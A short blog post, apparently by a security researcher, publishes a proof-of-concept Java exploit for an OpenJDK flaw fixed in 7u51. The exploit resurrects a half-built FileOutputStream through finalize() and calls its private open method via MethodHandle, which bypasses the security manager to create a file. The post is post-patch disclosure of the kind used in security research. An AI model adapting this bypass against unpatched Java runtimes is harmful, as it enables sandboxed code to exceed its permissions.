I tweeted
a while ago about an OpenJDK vulnerability that was
reported on one of the
mailing lists.
Now that it has been fixed in 7u51, here is a simple PoC exploit:
import java.lang.invoke.*;
class test extends java.io.FileOutputStream {
static test t;
test() throws Exception {
super("");
}
protected void finalize() {
t = this;
}
public static void main(String[] args) throws Throwable {
MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
MethodType.methodType(void.class, String.class, boolean.class));
System.out.println(mh);
try { new test(); } catch (Exception _) { }
System.gc();
System.runFinalization();
mh.invokeExact(t, "oops.txt", false);
}
}
Run this with a security manager enabled on a version earlier than 7u51 and it'll
create the file oops.txt, even though the code doesn't have the rights to do so.